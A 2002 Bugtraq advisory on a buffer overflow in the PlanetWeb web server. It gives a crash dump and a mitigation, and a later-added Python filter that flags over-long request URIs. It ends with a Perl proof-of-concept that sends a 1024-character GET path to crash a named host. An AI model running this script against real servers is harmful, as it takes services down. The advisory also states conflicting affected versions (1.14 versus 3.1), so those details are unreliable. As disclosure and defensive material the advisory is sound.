Bugtraq mailing list archives

Planet Web Software Buffer Overflow


From: "UkR security team™" <cuctema () ok ru>
Date: Sun, 15 Sep 2002 01:38:35 +0400

UkR security team presents:

Release Date : September 14, 2002
Product      : PlanetWeb Software v1.14 and earlier versions
Vendor       : PlanetDNS (http://www.planetdns.net)
Type         : Buffer Overflow
Author       : UkR-XblP (cuctema () ok ru)
Platforms    : Microsoft Windows Variants

About PlanetWeb:

PlanetWeb is a complete commercial software package that provides you with everything you need to run your own website directly from your computer. It includes our lightning fast web server with integrated PHP support, so you can create sophisticated web pages without doing any configuration!

Overview:

A buffer overflow exists in versions 3.1 and previous of PlanetWeb Software. Exploitation of this vulnerability allows remote execution of arbitrary code with daemon privileges.

Detailed Description:
Sending a GET request containing a URL of approximately 1024 characters or more causes Planet Web Server to crash. Exploitation is possible and proof of concept code has been authored to demonstrate this problem.

Result:
PDNSC caused an invalid page fault in
module KERNEL32.DLL at 0167:bff9db61.
Registers:
EAX=c00309c4 CS=0167 EIP=bff9db61 EFLGS=00010216
EBX=ffffffff SS=016f ESP=0214fde8 EBP=02150084
ECX=00000000 DS=016f ESI=81770a14 FS=4217
EDX=bff76855 ES=016f EDI=02150120 GS=0000
Bytes at CS:EIP:
53 8b 15 e4 9c fc bf 56 89 4d e4 57 89 4d dc 89
Stack dump:

Solution:
Disable the Planet Web Server until a patch is made available by the vendor.
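Until the vendor patch is available, the trigger described above (a request-target at or beyond roughly 1024 characters) is simple to catch in front of the server. The following Python is added here and is not part of the original post or of PlanetWeb: it classifies raw HTTP requests by request-target length so a filtering proxy or IDS rule can log or drop them before they reach the daemon; the threshold constant, function names and sample requests are this example's own assumptions.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Threshold taken from the advisory: URLs of roughly 1024 characters crash the server.
URI_LENGTH_LIMIT = 1024

# HTTP/1.x request line: METHOD SP request-target SP HTTP/major.minor
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/(\d)\.(\d)$")


def parse_request_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Split a request line into (method, target, version); None if malformed."""
    m = REQUEST_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return m.group(1), m.group(2), f"{m.group(3)}.{m.group(4)}"


def check_request(raw: bytes, limit: int = URI_LENGTH_LIMIT) -> Tuple[str, int]:
    """Classify one raw request as 'ok', 'oversize' or 'malformed'.

    Only the first line is inspected, so a verdict is available as soon as the
    request line has arrived, before any header parsing. The second element is
    the request-target length (or the raw line length when it did not parse).
    """
    first = raw.split(b"\n", 1)[0].decode("latin-1", "replace")
    parsed = parse_request_line(first)
    if parsed is None:
        return "malformed", len(first.rstrip("\r"))
    _, target, _ = parsed
    return ("oversize" if len(target) >= limit else "ok"), len(target)


def flag_requests(requests: Iterable[bytes], limit: int = URI_LENGTH_LIMIT) -> List[Tuple[int, str, int]]:
    """Return (index, verdict, length) for every request that is not 'ok'."""
    flagged = []
    for i, raw in enumerate(requests):
        verdict, length = check_request(raw, limit)
        if verdict != "ok":
            flagged.append((i, verdict, length))
    return flagged


# Constructed sample traffic (not captured data): a normal request, a request
# shaped like the advisory's proof of concept, and non-HTTP bytes on port 80.
SAMPLE_REQUESTS = [
    b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n",
    b"GET /" + b"A" * 1024 + b" HTTP/1.0\n\n",
    b"\x16\x03\x01\x00\x01",
]

if __name__ == "__main__":
    for idx, verdict, length in flag_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: {verdict} (request-target length {length})")
```

The limit is deliberately a parameter: tune it to the longest legitimate URL the site serves rather than to the crash threshold alone.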

----------------- exploit - cut here -----------------

#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
#
# Sends a single GET request whose path is 1024 bytes of "A", the length
# the advisory reports as sufficient to crash the PlanetWeb server.
use strict;
use warnings;
use IO::Socket;

unless (@ARGV == 1) { die "usage: $0 vulnerable_server ...\n" }
my $host = shift(@ARGV);

# Plain TCP connection to the HTTP daemon on port 80
my $remote = IO::Socket::INET->new( Proto    => "tcp",
                                    PeerAddr => $host,
                                    PeerPort => "http(80)",
                                  );
unless ($remote) { die "cannot connect to http daemon on $host\n" }

my $xblp    = "A" x 1024;                        # over-long request path
my $exploit = "GET /" . $xblp . " HTTP/1.0\n\n"; # request line plus empty header block
$remote->autoflush(1);
print $remote $exploit;
close $remote;

----------------- exploit - cut here -----------------